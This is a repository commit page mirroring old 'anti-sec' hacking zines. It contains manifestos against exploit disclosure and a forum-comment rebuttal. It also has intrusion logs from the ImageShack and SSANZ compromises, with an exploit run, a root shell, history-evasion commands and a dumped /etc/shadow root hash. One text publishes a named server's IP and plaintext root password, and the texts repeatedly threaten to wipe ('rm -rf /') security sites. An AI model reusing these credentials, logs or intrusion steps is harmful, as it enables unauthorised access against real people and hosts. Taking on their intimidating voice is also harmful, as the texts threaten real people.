Mirrors
/
Zines
mirror of https://github.com/fdiskyou/Zines.git
1
0
Fork 0
Code Issues Releases Wiki Activity

1st import into tree

This commit is contained in:
Rui Reis 2016-12-14 20:33:42 +00:00
commit 7f7bcee47a
13 changed files with 15028 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md Normal file
View File

@ -0,0 +1,2 @@
# Zines
mirror of my favourite hacking Zines for the lulz and nostalgy

11156
anti-anti-sec/anti-anti-sec.txt Normal file
View File

File diff suppressed because one or more lines are too long

136
anti-sec/astalavista-comments.txt Normal file
View File

@ -0,0 +1,136 @@
We have all seen the latest anti-sec hacks. We've been reading the comments and wanted to address a few of you.
>> [ ProducedRaw ]
>> I disagree. The guys they are targeting are blackhats and so they chose to be in the line of fire. It's like freaking out over a soldier getting shot.
While you are right about them being in the line of fire by their own will, you
are dead wrong about who these people are. Sometimes we have to remind ourselves
about how ignorant the public is, due in full by the people getting paid to lie.
You will be spared hearing about the long, long history behind hacking. This
stuff is set-in-stone and there's not much people can do to argue for or against
these definitions.
Whitehat: asshole who publicly posts exploits, tools, etc. normally sucks
dick for money (do you actually need a citation or have we shared
enough?)
Greyhat: no such fucking thing
Blackhat: someone who is hacking and not posting shit public. But there's a
HUGE difference between the blackhat hacking scene and the
underground. That's a long story though.
Therefore, it's safe to say that this Astalavista cult and the rest of their
sheep followers (no offense to sheep) are FAR from being blackhats or even
respectable and intelligent "computer scientists" or whatever the fuck they feel
like calling themselves.
Why? Not only do they sit and run ./nmap and think they're badass but they
MIRROR EXPLOITS that are publicly available and sell them. They make a living
off of public and FREE information. They provide little kids with copy-and-paste
tutorials on how to launch attacks with those scripts/tools/exploits too.
But then they offer security solutions to another company... do you see what's
going on here? They cause a problem, and provide (commercially) a fix for it.
Hell, they can't even apply those patches to their own servers!
>> [ illuminatedwax ]
>> See I don't see a problem with getting hacked if people are using 0days on software that you haven't personally created.
>> That's just the way things are. But in this case apparently they stole some passwords from his Gmail account. That's fucking stupid.
You are missing the point. If you're running a security website / company and at
the same time you can't even secure your own god damn workspace, website, or
server and you save plaintext passwords in databases, you deserve to be rm'd.
It doesn't even matter if they were stolen passwords from the gmail account
(they weren't). He should have been much smarter than that. He has an IT CV so
big and a mouth even bigger yet he gets owned. There are no excuses and no
conditions.
>> [ xb4r7x ]
>> lmao... that guy really needs to lay off the caps lock.
>> [EDIT]: I was going to go on an anti-sec rant... but I have a call to go on. Will post when I'm back at my desk.
>> [EDIT2]: Here's my opinion on anti-sec groups. If any of you belong to these groups, which I'm sure at least some of you do...
>> pay close attention to this, then look at yourself in the mirror. You'll thank me later.
>> Black hats are people who sit in their basement on a computer with the lights off with the sole purpose of breaking into systems and causing mayhem.
>> Why? Well nobody really knows... but it's similar to a kid with a magnifying glass near an ant hill.
>> They generally lack social skills and for whatever reason don't want to develop them by going outside and enjoying the world.
>> They take pleasure in other people's pain, and have massive inferiority complexes.
>> This is the main reason they do what they do IMO... they can't make friends like everyone else, feel inferior,
>> and need to prove to themselves that they're better than others. So they break into other people's computer systems to prove that they're better.
>> When really, they're just assholes with no life.
>> There is another type of black hat as well... and they're just sadistic bastards with few redeeming qualities.
>> Dear BH's Make the world a better place... don't try to destroy it just to see what happens. Nothing you've ever done,
>> or ever will do will keep people from living their lives. You're all cockroaches.
>> </rant>
>> In all honesty, you can forget everything I just said...
>> I just have a serious problem with people who fuck with other people for what seems like no reason. Especially when they hide behind the internet.
>> Oh yeah, and they're cry babies. "WAAAHHH DON'T TELL PEOPLE THEIR SHIT IS BROKEN!! THEN THEY'LL FIX IT AND I CAN'T ATTACK THEM ANYMORE!!!" - Idiots
You have the general media image of a "blackhat", carved into your thoughts by
the very people that we've exposed time and time again. The security industry
has no facts to back up on their talk, and nor do you.
Take a good look at the people getting pwned by the blackhats and the
underground. It wasn't this way a long time ago, but you will notice that these
days a good majority are promoting an industry and skewed culture which they
are unable to learn from and apply to their own servers. They are hypocrites.
There is some more terminology that we have to clear up.
Hackers: THEY HACK SHIT. They are not necessarily programmers that broke their
etch-a-sketches apart when they were 5 years old and inhaled the
powder.
Crackers - Reverse engineers, not "hackers who use the information for
destruction".
Anything else is a fucking lie and anyone who believes it is taking it up the
ass by not only the security industry but the whitehats that use stereotypes to
enhance their own image and get them jobs.
Now, when you look at all of the kids running rampant hacking random places with
no skills at all, how are they obtaining the tools to do it? Sites like
Astalavista and people like Glafkos ( nowayout ).
Now do you see why we target these people? It's not about telling people, "your
shit is broken," it is about ZERO DISCLOSURE of exploits to the general public.
If you don't follow that, then you are contributing to the security industry and
making a lot of fucktards money they do not deserve because they obtain it
through lying and scaring people into using their products.
This diagram will help demonstrate:
[ Full-Disclosure ] ----> milw0rm / websites that mirror milw0rm / publish exploits / copy-and-paste tutorials ---> script kiddies with no clue on why / how said script
works,
but they do have a tutorial to follow, line by line ---> companies and people getting hacked / destroyed.
What are blackhats doing exactly?
Hacking and exposing the websites / people who are promoting those exploits to the public, selling a service that they cannot provide, lying and cheating...
Hence why blackhats are against full disclosure Maybe a few good things do happen from full disclosure, but on the bigger picture it's mostly bad.
>> [ xb4r7x ]
>> Idc how much of an idiot the guy was for not securing his data. Hacking his box is still wrong... even if he did ask for it.
>> It bothers me that people do this shit just to prove that they can.
>> Although I was mildly amused that pretty early on in the list of emails they had detected the 'script kiddies'... but still did nothing to keep them out.
If he was your average joe with no security on his data, it would have been all fine, but this guy actually says he is a security expert, his CV mentions 5+ certificates.
This was not to prove they can, but more like to expose those people who claim they are security experts, claim they are whitehats... while it didnt take much effort to
break
into there servers, find exploits, milw0rm mirrors, bad code, etc...
>> [ chia_pet ]
>> Wow. What a bunch of asshats. What's so horrifically wrong about publishing information that could lead to more security?
Read above, you miss the point.. It is not against the security, it is against the security industry.
>> [ benologist ]
>> Who cares if they were profiting? Why are we against everyone but ourselves making money?
It is more about how they were profiting,
disclosing exploits to the public then offering security against the huge threat of "hackers".. while they couldn't secure there own servers / scripts.

1983
anti-sec/astalavista.txt Normal file
View File

File diff suppressed because it is too large Load Diff

95
anti-sec/imageshack-pwned.txt Normal file
View File

@ -0,0 +1,95 @@
__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__| /____ >\___ >\___ >
\/ \/ \/ \/ \/
Proudly presents...
_ _ _
(_) | | | |
_ _ __ ___ __ _ __ _ ___ ___ | |__ __ _ ___| | __
| | '_ ` _ \ / _` |/ _` |/ _ \' / __| | '_ \ / _` |/ __| |/ /
| | | | | | | (_| | (_| | __/ \__ \ | | | (_| | (__| <
|_|_| |_| |_|\__,_|\__, |\___| |___/ |_| |_|\__,_|\___|_|\_\
__/ |
|___/
Anti-sec. We're a movement dedicated to the eradication of
full-disclosure. We wanted to give everyone an image of what we're all
about.
Full-disclosure is the disclosure of exploits publicly - anywhere. The
security industry uses full-disclosure to profit and develop
scare-tactics to convince people into buying their firewalls,
anti-virus software, and auditing services.
Meanwhile, script kiddies copy and paste these exploits and compile
them, ready to strike any and all vulnerable servers they can get a hold
of. If whitehats were truly about security this stuff would not be
published, not even exploits with silly edits to make them slightly
unusable.
As an added bonus, if publication wasn't enough, these exploits are
mirrored and distributed widely across the Internet with a nice little
advertisement embedded in them for the crew or website which first
exposed the vulnerability to the public.
It's about money. While the world is difficult to change, and money will
certainly continue to be a very important in the eyes of many, our
battle is that of the removal of full-disclosure for the purpose of
making it harder for the security industry to exploit its consequences.
It is our goal that, through mayhem and the destruction of all
exploitive and detrimental communities, companies, and individuals,
full-disclosure will be abandoned and the security industry will be
forced to reform.
How do we plan to achieve this? Through the full and unrelenting,
unmerciful elimination of all supporters of full-disclosure
and the security industry in its present form. If you own a security
blog, an exploit publication website or you distribute any exploits...
"you are a target and you will be rm'd. Only a matter of time."
This isn't like before. This time everyone and everything is getting
owned.
Signed: The Anti-sec Movement
"No images were harmed in the making of this... image."
anti-sec:~/pwn# perl img-scan.pl
Found img1.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
[snip]
Found img998.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
anti-sec:~/pwn# perl mass-pwn.pl
Connecting...
Linux worf.imageshack.us 2.6.15-1.2054_FC5 #1 SMP Tue Mar 14 15:48:20 EST 2006 x86_64 x86_64 x86_64 GNU/Linux
Replacing images...
img1 --> img998
All images replaced: http://img998.imageshack.us/antisec.jpg
If you think that we oppose your website, our advise is to pack it up and shut it down, because we're coming for you.
- anti-sec.

291
anti-sec/romeo-last-stand.txt Normal file
View File

@ -0,0 +1,291 @@
__ .__
_____ ____ _/ |_ |__| ______ ____ ____
\__ \ / \\ __\| | / ___/_/ __ \_/ ___\
/ __ \_| | \| | | | \___ \ \ ___/\ \___
(____ /|___| /|__| |__|/____ > \___ >\___ >
\/ \/ # exit \/ \/ \/*no more*
-----[ Intro:
No, romeo.copyandpaste.info did not get hacked, I am just doing what should be done about this mess...
A few companies were getting hacked by anti-sec just now, but I decided you don't deserve to know who gets owned,
I will keep the access to myself and you will _never_ know you got hacked.
Let me try and make a few things clear.
-----[ The Beginning:
93K Jun 4 astalavista.txt
This is where it all started, 'anti-sec' the 'group' name was born there, people made up the rest of stories and believed them.
159K Jun 10 nowayout.txt
He is a moron, 'nuff said.
27K Jul 3 ssanz-pwned.txt
Swear by your own security, this is where it gets you.
3.4K Jul 10 imageshack-pwned.txt
Sent the message to everyone, everyone understood it differently.
--[ Astalavista - The hacking and security community.
They didn't have hackers, security or a community, I did the Internet a favor by taking them down.
--[ Glafkos / nowayout - The CEH / Security Expert / [Insert-IT-Cert-Here].
He couldn't stop an attack on his own server, got rm'd and shutdown while he is actually logged on the server...
How pathetic.
--[ SSANZ - Server Systems Administration NZ, Security, Hardening and Backup solutions.
They couldn't secure their servers and had no backups... 'nuff said?
--[ ImageShack.
Even though it clearly said:
"No images were harmed in the making of this... image."
Most of you idiots reacted with:
"omg what does imageshack have to do with security, those guys are brutal and against their own beliefs".
-----[ You are a moron:
So a 'group' by the name of 'anti-sec' who are *against full-disclosure* publishes a hack-log with a few exploits used in it...
The whole idea is that you, the script kiddie (along with the rest of the Internet) NEVER knew how anti-sec actually got in, get it now?
felosi decides it is actually an OpenSSH 0day,
WebHosting Talk forums makes a huge hype about it,
SANS believes it,
HostGator DISABLES OpenSSH on all servers and claims they have a fix for it,
TheRegister writes about it...
...and the rest of the Internet and the 'security industry', just like sheep, follows everyone else and
claims surface of 'patches' for the 0day, some said they will release it on DefCon, others started there
own fake exploit (Some people actually fell for that)...
You people are a pack of morons, honestly.
I let you talk about it, laughed as some of you started writing patches, then I had my share of lulz when
hosts decided to shut down OpenSSH because of a rumor that was started by felosi because a client of his
(nowayout / Glafkos the security expert, remember him?); thought it was an OpenSSH 0day. lol.
This is just another proof of how stupid the people you go to for 'security' online, how easy it is to create
havoc online amongst you, I didn't even have to start the rumor, your own people did and you believed it.
-----[ anti-security:
Now off to another, more important point; anti-security...
*This is my idea of anti-security, you are free to have your own, but the ideas I saw online are stupid, really*
Some of you thought anti-security is against -security-, while it is really against the security -industry-,
I don't want you to be insecure to hack you, where is the challenge in that?
Others thought anti-security is about 0 disclosure of any kind, it is truly against full disclosure, where
an actual exploit code is posted instead of an advisory to the public...
I understand that disclosure is a must-have, I am not against it, I am against the people who post and help in
spreading exploit code, Can you please tell me what good (if any) comes out of posting exploit code?
I am pretty sure it does more harm than good, way more. Some suggested anti-sec should give people an alternative
of what should be done, well here it is, sirs..
Instead of posting an exploit code for the vulnerability you found, post an advisory, explain the vulnerability you found
to the people, gain fame and credit from it, attach a PoC if necessary... but do NOT post an exploit!
Now of course that will not stop 'hackers' from hacking, but it will decrease the number of random attacks, a lot,
and everyone will benefit from it, you will gain your fame and credit for it, you can post that on your sorry ass CV.
-----[ Comments and Response:
#bhf <+Aelphaeis> antisec hacked BHF ?
#bhf <+Aelphaeis> won't the antisec guys do it again ?
#bhf <+Aelphaeis> antisec, makes no fucking sense
#bhf <+Aelphaeis> BHF is clearly pro antisec
You are as stupid as you sound.
#bhf <%Glyph> 1. romeo.copyandpaste.info is a rr account.
#bhf <%Glyph> 2. romeo.copyandpaste.info's ns entries point to afraid.org
ORLY?
#bhf < HTH> I wonder who anti-sec is lulz
#bhf < HTH> Ive long since decided its not dark
#bhf < HTH> or r0meo
#bhf < HTH> so now im puzzled
I lol'd.
#bhf < fr0natz> HTH, I see that point.
#bhf < fr0natz> Romeo, lul'd a bit there.
So did he.
>>T Biehn < tbiehn@gmail.com>
>>1) Register 'Anti-Sec *' with Free Mail Provider
>>2) Claims to Full Disclosure
>>3) ????
>>4) PROFIT.
True that.
>>ifwm
>>So, Anti-sec is Microsoft?
No.
>>DrGirlfriend
>>what a group of assholes (anti-sec, not imagshack). Seriously, in what way was imageshack involved in their beef with the security profession?
What a moron.
>>siggplus
>>So hackers are against full disclosure? What a shocker.
I know right?
>>oobey
>>Woah, guys! I just discovered the most amazing thing - if you don't talk about bad things,
>>it's like they DON'T EXIST AT ALL!! As far as I'm concerned, I'm no longer living in a world with an economic crisis,
>>global warming, OR wars in the Middle East!
>>
>>Thanks, anti-sec!
As DarkPontifex would say, Cool story bro.
It is more like, if you do not practice, publish or mirror exploits, script kiddies wont exist at all and the world will be a better place!
No problem, btw.
>>SyrioForel
>>They're not trying to protect anybody from exploits, they're trying to protect their own exploits from being advertised. Get it?
Oh okay, thanks for clearing that up for me...
You are wrong, it is truly about not publishing exploits, you will not get our exploits because no one knows how we get in, when we got in, etc.
>>freshtimes
>>I don't think they're attacking you as much as using imageshack's prevalence across the internet
>>as a way to embed images as a vehicle for their message.
Finally someone gets it.
>>Clumpy
>>A self-righteous stupid hacker group at that. Full disclosure is the only thing that causes companies to patch.
>>History shows us, over and over again, that companies won't spend the money to patch security holes without full disclosure forcing them to it.
If you are so concerned about the patch, why don't you release a patch yourself instead of releasing an exploit code to 'force them to patch'.
>>alchemeron
>>A short-sighted approach. Part of the reason for a culture of published exploits is that,
>>if you don't publish or threaten to publish, companies will do absolutely nothing.
If everyone works by that, a lot more 'security' companies will be exposed, hacked and rm'd, because if you don't publish that they
cannot secure their own work, make backups or actually provide the service they offer, they will never fix it, right?
What about posting a nice advisory, saying you found vulnerability X in product Y, maybe a PoC. if company doesn't fix, you did your job,
no need to publish an exploit code and make thousands of websites / companies suffer while script kiddies ./xploit.
>>anti-antisec@hushmail.com
>>LMH, can you and your "Security Justice" friends please get laid
>>and leave the rest of us alone? This Anti-Sec rebranding is more
>>boredom.
>>
>>Oh- we know where you work, and who some of you really are. I
>>wonder how they'd feel about this stupidity?
You don't know anything about any of us and you will never.
Your servers were rooted back in 2007 and we never lost access until 2009 (maybe not), how do you feel about this stupidity?
>>Ant-Sec Movement < anti.sec.movement@gmail.com>
>>Dear Reader,
>>
>>In light of recent events, we have decided to clarify exactly what the Anti-Sec Movement is, and who we really are.
>>Firstly, Anti-Sec is NOT an individual clan or group; as the name implies, we are a movement
>>< snipped>
You have nothing to do with the movement, you saw a wave of people and posts talking about anti-sec and wanted to get some
attention on your sorry ass.
Your targets are still up, all you ever did was a pathetic DDoS attack. You fail.
>>http://www.theregister.co.uk/2009/07/13/imageshack_hack/
>>Ironically, exploit code associated with Anti-Sec's latest attack was posted on a full disclosure mailing list.
Nothing was ever posted, k?
...and many, many other stupid comments.
-----[ Outro:
Well I guess this is it, publicly owning people goes nowhere, people are too stupid, some love to make up their own stories
and others will do anything to ride a publicity wave... rarely ever anyone actually gets the point.
Before I leave you, I cannot stress enough that you are not as secure as you think you are,
Full-Disclosure brings more evil than good, it is the root of most DDoS attacks, random web defacement, spam, havoc, etc.
Publish an advisory if you must, do -not- publish an exploit, do -not- mirror exploits.
str0ke should realize by now that most of the botnets out there, the spam, the Turkish web defacement... is his fault.
If you think otherwise, do post about it, be sure that I will be reading it, but I doubt you can find more good coming out
of full-disclosure than evil.
And of course we must not forget, it is not just about Full-Disclosure, but also the people who claim they can protect you,
claim they are a security company, swear by their own security, etc. Actually cannot provide you with that service, they
cannot protect you, they cannot protect themselves, they don't know the basics of security, they read a tutorial on installing
CSF/LFD, mod_security, iptable OpenSSH and call it -secure-.
Take felosi for example, he runs secureservtech:
>>Extensive security to protect your sites and data from hackers.
>>Including mod_security, suhosin, cgi suexec,, php suexec, brute force protection on all protocols and more..
72.20.1.206 - backup.secureservtech.com - The main backup server for SST, it has access to every other server SST owns.
root:T6yHjuIkol0
*OpenSSH is whitelisted for specific IP's only, he included mod_security, suhosin patch, grsecurity, csf/lfd... How classic.
Did he protect his customers from hackers like he says? is *secure*servtech really *secure*? does felosi know he got owned?
No.
- Did you get scared of getting caught?
-- no, I just didn't like how this turned out to be, taking a different approach from now on.
- Are you going to stop shutting down people who publish exploits, exposing people who swear by their own security, etc?
-- no, but this time you will never know who got owned, no logs will be published, I will keep my access for greater benefit.
If you want the old page for any reason, you can download mirror here: http://romeo.copyandpaste.info/mirror.tgz
So Long, and Thanks for All the Fish.
- romeo.

679
anti-sec/ssanz-pwned.txt Normal file
View File

@ -0,0 +1,679 @@
__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__| /____ >\___ >\___ >
\/ \/ \/ \/ \/
Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>> * Scan for Shells/malicious scripts
>> * Scan for vulnerable web content ( permissions, RFI's )
>> * Scans for Vulnerable Server Services
>> * Vulnerable Ports
>> * Testing of TCP handling - dDOS test.
>> * Scan for Vulnerable PHP scripts/mods.
>> * Control Panel Security Audit ( external )
>> * Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>> * Permissions/Ownership(s) Review
>> * Apache/Webserver Security
>> * User Account Security & binaries access audit
>> * Local RFI Exploits located/patched.
>> * System Binary Security Audit
>> * Firewall/IPTABLES Audit
>> * Bruteforce detection test & audit
>> * Root Access Authentication Audit
>> * Local PHP Functions Audit
>> * Control Panel Security Audit ( Internal )
>> * Kernel Security Audit
>> * Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
-rw------- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
